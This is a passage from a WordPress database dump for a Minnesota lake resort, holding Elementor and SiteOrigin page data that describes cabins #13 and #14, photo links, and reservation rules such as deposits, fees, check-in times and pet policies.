kitchen.<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3188235\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3ae6faf\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9c43867\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8610c84\"}]},\"elements\":[{\"id\":\"7fbb51d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.38.10-PM.png\",\"id\":782}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d87bedc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Done in knotty pine the cabin has air conditioning, TV and full kitchen.<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"41f8343\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"478e9cb\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8309568\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a685e8c\"}]},\"elements\":[{\"id\":\"6a8b220\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.38.17-PM.png\",\"id\":783}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7203260\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"wp-caption-text\\\"><br \\/><strong>Done in knotty pine has air conditioning, full kitchen and bathtub<\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8075410\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2c48cf1\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"dcac1af\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d389044\"}]},\"elements\":[{\"id\":\"e118b35\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"97d9b2a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8c7465d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"11e2398\"}]},\"elements\":[{\"id\":\"5e6d46e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Cabin1011interior02.jpg\",\"id\":280}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"47acfec\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c86872a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a8e8c8e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"17be54e\"}]},\"elements\":[{\"id\":\"0cd24ef\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Cabin12interior.jpg\",\"id\":284}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4384dfc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9fd9d04\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2873594\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"88e6c47\"}]},\"elements\":[{\"id\":\"a7d623e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3948.jpg\",\"id\":388}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2782,884,'_wp_page_template','default'),(2783,884,'_elementor_edit_mode','builder'),(2784,884,'_elementor_template_type','post'),(2785,884,'_elementor_version','2.5.15'),(2786,884,'_elementor_data','[{\"id\":\"50e917a\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"b6ee1cc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c15ef20\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6364ee2\"}]},\"elements\":[{\"id\":\"25a144c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a1bbc9a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a12116a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"74c336e\"}]},\"elements\":[{\"id\":\"e69cdee\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2><span style=\\\"text-decoration: underline;\\\">I have a couple of weeks in August that I am going to split up into 3 or 4 night stays. Call for details !!!<\\/span><\\/h2><h3>Love to stay in a Newer Cabin \\u2013 <a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Call us to book it 218-747-2959<\\/a><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"71c9c9f\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"daa79a5\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8b7f04d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"02be74a\"}]},\"elements\":[{\"id\":\"91a0fc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5009976\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"cc92fdd\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"38976b4\"}]},\"elements\":[{\"id\":\"2dd3697\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>#13<\\/strong><\\/p><p>This is one of the newer cabins located on the swimming beach. It is a 2 bedroom with 1 bath. There is also a queen size futon and hide-a-bed sofa in the livingroom. Enjoy looking over the lake sitting at the breakfast bar or on the deck. There is a full kitchen, central air conditioning and television. This unit is handicap accessible. This unit is No Smoking, no Pets.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0de354b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"51563f4\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a399b62\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c6ce686\"}]},\"elements\":[{\"id\":\"90da9a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"bac4c3c\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"691551b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a6da7ce\"}]},\"elements\":[{\"id\":\"5a1fef2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC05132-1.jpg\",\"id\":350}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"05fe721\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"48b0790\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1dc779e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"10aea88\"}]},\"elements\":[{\"id\":\"4de5a2c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3937.jpg\",\"id\":378}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5333298\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"13c67c3\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"12adb22\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e5ee1fc\"}]},\"elements\":[{\"id\":\"58909e0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3939.jpg\",\"id\":380}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f1d6275\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"94dfae0\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1a806a0\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"db0a78a\"}]},\"elements\":[{\"id\":\"d4a2c33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e2ad2df\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"169f623\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"94e664c\"}]},\"elements\":[{\"id\":\"24c7810\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3946.jpg\",\"id\":386}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"910371e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"bc94767\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"12bcc27\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b3b5c83\"}]},\"elements\":[{\"id\":\"af9c607\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3942.jpg\",\"id\":382}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ca993d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7307f5a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1e3851b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8d18dbc\"}]},\"elements\":[{\"id\":\"5cbedc6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3938.jpg\",\"id\":379}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5ac3587\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"66bd1f4\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"eb116ed\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6eb21bc\"}]},\"elements\":[{\"id\":\"98126ac\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"45ebf30\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"237e527\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e166c30\"}]},\"elements\":[{\"id\":\"6ad4744\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>#14<\\/strong><br \\/>Is also one of the newer cabins and is 2 bedroom with 1 bath. There is also a queen size futon and hide-a-bed sofa in the livingroom.<br \\/>The deck over looks the lake and this cabin has a fire ring and patio. There is a full kitchen, central air conditioning and television.<br \\/>This is a No Smoking, no Pets unit. test<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"321d0a2\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2699905\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"50936de\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"93a9ddc\"}]},\"elements\":[{\"id\":\"3473758\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9a06343\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"46d7bbd\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"596cd90\"}]},\"elements\":[{\"id\":\"0ebaaa5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/newCabin14.jpg\",\"id\":317}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"916a3db\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1c96d80\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1dffc8b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"1276762\"}]},\"elements\":[{\"id\":\"c80be6a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3941.jpg\",\"id\":381}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b322842\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"ba166f6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"8c21e44\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"83a5d56\"}]},\"elements\":[{\"id\":\"6189189\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3942.jpg\",\"id\":382}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2806,888,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:193:\"Call us at 218-747-2959 for reservations \n\nA 40% DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. \nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\n\nWireless Internet Available\n\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"11204652295ac05b55c096b837426865\";s:19:\"_sow_form_timestamp\";s:13:\"1561209629391\";s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-88810000\";s:11:\"option_name\";s:17:\"widget_sow-editor\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"34e797fc-6974-4b3b-8eb6-544b37e4a209\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:10:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=1 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"18793130955c116b6806d46092030907\";s:19:\"_sow_form_timestamp\";s:0:\"\";s:2:\"id\";s:18:\"sow-editor-4310001\";s:11:\"option_name\";s:17:\"widget_sow-editor\";s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-88810001\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:1078:\"<p>ALL Cabins and Motel rooms are NON smoking !!</p>\n<p>Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets<br />\nPrices shown are for groups of 4 or less  All Daytime (Not Overnight) Guests $5.00 each  Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.<br />\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875%  ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.  PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.<br />\nA 40% DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION.  ALL DEPOSITS ARE NON-REFUNDABLE.</p>\n<p>A 3% PROCESSING FEE WILL BE ADDED FOR ALL CREDIT AND DEBIT CARD USAGE.</p>\n<p>CHECK IN TIME IS AFTER 3:00PM  <strong>NO</strong> EXCEPTIONS !!  CHECK OUT TIME IS BEFORE 10:00AM, <strong>NO</strong> exceptions !!<br />\nPets on a leash are welcome in all campsites ( 2 pets per campsite)  and some of the units ( 1 pet per unit where allowable).<br />\nPlease do not bring firewood, if you live more than 50 miles from Ashby!<br />\nMOTEL OPEN YEAR ROUND.  Call to set up reservations for Hunting and Ice fishing.</p>\n\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:31:\"3546584265c116ab1dc10e015252218\";s:19:\"_sow_form_timestamp\";s:13:\"1563228778737\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-88810002\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:3;a:10:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=2 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"20718259185ac05cee9f16d963512666\";s:19:\"_sow_form_timestamp\";s:13:\"1522556152258\";s:2:\"id\";s:18:\"sow-editor-4310003\";s:11:\"option_name\";s:17:\"widget_sow-editor\";s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-88810003\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"deca295a-37eb-45d6-bbe2-3e8cf611f0f3\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:1:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(2824,890,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:283:\"Call us at 218-747-2959 for reservations \n\nA 40% DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.  BALANCE IS DUE UPON ARRIVAL.\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW.\nALL GUESTS MUST CHECK IN AT THE RESORT OFFICE UPON ARRIVAL.\n\nWireless Internet Available\n\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"11204652295ac05b55c096b837426865\";s:19:\"_sow_form_timestamp\";s:13:\"1563738164188\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"34e797fc-6974-4b3b-8eb6-544b37e4a209\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-89010000\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:1;a:10:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=1 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"18793130955c116b6806d46092030907\";s:19:\"_sow_form_timestamp\";s:0:\"\";s:2:\"id\";s:18:\"sow-editor-4310001\";s:11:\"option_name\";s:17:\"widget_sow-editor\";s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-89010001\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:1078:\"<p>ALL Cabins and Motel rooms are NON smoking !!</p>\n<p>Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets<br />\nPrices shown are for groups of 4 or less  All Daytime (Not Overnight) Guests $5.00 each  Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.<br />\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875%  ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.  PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.<br />\nA 40% DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION.  ALL DEPOSITS ARE NON-REFUNDABLE.</p>\n<p>A 3% PROCESSING FEE WILL BE ADDED FOR ALL CREDIT AND DEBIT CARD USAGE.</p>\n<p>CHECK IN TIME IS AFTER 3:00PM  <strong>NO</strong> EXCEPTIONS !!  CHECK OUT TIME IS BEFORE 10:00AM, <strong>NO</strong> exceptions !!<br />\nPets on a leash are welcome in all campsites ( 2 pets per campsite)  and some of the units ( 1 pet per unit where allowable).<br />\nPlease do not bring firewood, if you live more than 50 miles from Ashby!<br />\nMOTEL OPEN YEAR ROUND.  Call to set up reservations for Hunting and Ice fishing.</p>\n\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:31:\"3546584265c116ab1dc10e015252218\";s:19:\"_sow_form_timestamp\";s:13:\"1563228778737\";s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-89010002\";s:11:\"option_name\";s:17:\"widget_sow-editor\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}i:3;a:10:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=2 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"20718259185ac05cee9f16d963512666\";s:19:\"_sow_form_timestamp\";s:13:\"1522556152258\";s:2:\"id\";s:18:\"sow-editor-4310003\";s:11:\"option_name\";s:17:\"widget_sow-editor\";s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-89010003\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"deca295a-37eb-45d6-bbe2-3e8cf611f0f3\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:1:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(2860,894,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:330:\"Call us at 218-747-2959 for reservations \n<strong>NO checkins after 10:00 PM !!</strong>\n\nA 40% DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.  BALANCE IS DUE UPON ARRIVAL.\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW.\nALL GUESTS MUST CHECK IN AT THE RESORT OFFICE UPON ARRIVAL.\n\nWireless Internet Available\n\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"11204652295ac05b55c096b837426865\";s:19:\"_sow_form_timestamp\";s:13:\"1564831769562\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"34e797fc-6974-4b3b-8eb6-544b37e4a209\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-89410000\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:1;a:10:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=1 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"18793130955c116b6806d46092030907\";s:19:\"_sow_form_timestamp\";s:0:\"\";s:2:\"id\";s:18:\"sow-editor-4310001\";s:11:\"option_name\";s:17:\"widget_sow-editor\";s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-89410001\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:1078:\"<p>ALL Cabins and Motel rooms are NON smoking !!</p>\n<p>Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets<br />\nPrices shown are for groups of 4 or less  All Daytime (Not Overnight) Guests $5.00 each  Max Occupancy: Motel 